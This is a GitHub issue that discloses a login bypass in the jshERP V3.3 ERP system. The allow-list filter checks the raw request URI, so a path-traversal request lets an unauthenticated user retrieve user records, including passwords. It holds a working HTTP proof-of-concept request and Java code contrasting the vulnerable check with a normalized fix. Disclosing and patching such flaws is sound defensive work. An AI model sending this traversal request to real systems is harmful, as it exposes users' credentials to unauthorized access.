jishenghua / jshERP

Guanyijia ERP (formerly Huaxia ERP) is built on the Spring Boot framework and the SaaS model, and aims to give small and medium-sized enterprises an easy-to-use open-source ERP; it currently focuses on purchase/sales/inventory plus finance. Main modules are retail management, purchasing management, sales management, warehouse management, financial management, report queries and system administration. It supports prepayments, income and expenses, warehouse transfers, assembly/disassembly, orders and other special features, and provides reports such as stock status and inbound/outbound statistics. Roles and permissions are controlled in fine detail, down to each button and menu.
https://www.gyjerp.com
GNU General Public License v3.0
3.17k stars, 1.15k forks

There is an Incorrect Access Control vulnerability in jshERP V3.3 that leads to the leakage of sensitive information in the backend system #98

Open aoaoaoe opened 10 months ago

aoaoaoe commented 10 months ago

1. The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java, and the affected function is doFilter.

In the filter code, use servletRequest.getRequestURI() to obtain the request path, and then determine whether the path contains /doc.html, /user/login or /user/register. If so, execute chain.doFilter(request, response) to skip this filter. Otherwise, continue to check.

Then determine whether the path starts with one of the allowUrls. If so, execute chain.doFilter(request, response) to skip this filter.

See the screenshot below for the value of allowUrls.

2. The problem lies in using servletRequest.getRequestURI() to obtain the request path. The path obtained by this function will not parse special symbols but will be passed on directly, so you can use ../ to bypass it. Taking one of the backend interfaces, /jshERP-boot/user/getAllList, as an example, using /user/login/../../jshERP-boot/user/getAllList makes it satisfy requestUrl.contains("/user/login"), and at the same time it can request the getAllList interface to achieve login bypass.

3. The PoC is as follows:

```http
GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
Host: 192.168.124.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

When accessing the /jshERP-boot/user/getAllList interface directly, it will return "loginOut".

When accessing the /user/login/../../jshERP-boot/user/getAllList interface, the user information can be obtained by bypassing the access control, which also includes user passwords.
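The root cause described above, as an added example that is not jshERP's own code: the allow-list check as the report describes it (substring/prefix matching on the raw request URI) beside a hardened variant that normalizes dot segments and requires an exact match. ALLOW_URLS is assumed, since the issue only shows allowUrls in a screenshot.

```java
import java.net.URI;
import java.util.List;

public class AllowListCheck {
    // Assumed allow-list (the report shows the real allowUrls only in a screenshot).
    static final List<String> ALLOW_URLS = List.of("/doc.html", "/user/login", "/user/register");

    // Mirrors the check described in the issue: getRequestURI() is matched with
    // contains()/startsWith() on the raw, un-normalized path, so a path such as
    // "/user/login/../../jshERP-boot/user/getAllList" is treated as a login URL.
    static boolean skipsFilterVulnerable(String rawUri) {
        for (String allow : ALLOW_URLS) {
            if (rawUri.contains(allow) || rawUri.startsWith(allow)) return true;
        }
        return false;
    }

    // Hardened variant: collapse "." and ".." with URI.normalize(), reject any path
    // that changed under normalization (or still begins with ".."), then require an
    // exact match. In a servlet filter, compare the path with the context path
    // (e.g. "/jshERP-boot") already stripped, as request.getServletPath() returns it.
    static boolean skipsFilterHardened(String rawUri) {
        String normalized;
        try {
            normalized = URI.create(rawUri).normalize().getPath();
        } catch (IllegalArgumentException e) {
            return false; // unparseable URI: do not skip the authentication check
        }
        if (normalized == null || normalized.startsWith("/..") || !normalized.equals(rawUri)) {
            return false; // dot segments or encoded characters were present: keep checking
        }
        return ALLOW_URLS.contains(normalized);
    }

    public static void main(String[] args) {
        String bypass = "/user/login/../../jshERP-boot/user/getAllList"; // path from the PoC
        String login = "/user/login";
        System.out.println(skipsFilterVulnerable(bypass)); // true: the filter is skipped
        System.out.println(skipsFilterHardened(bypass));   // false: normalization changed the path
        System.out.println(skipsFilterHardened(login));    // true: legitimate login URL
    }
}
```

A defender can also use the same comparison to flag requests whose raw URI differs from its normalized form, since legitimate clients almost never send dot segments.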

jishenghua commented 10 months ago

OK, understood.
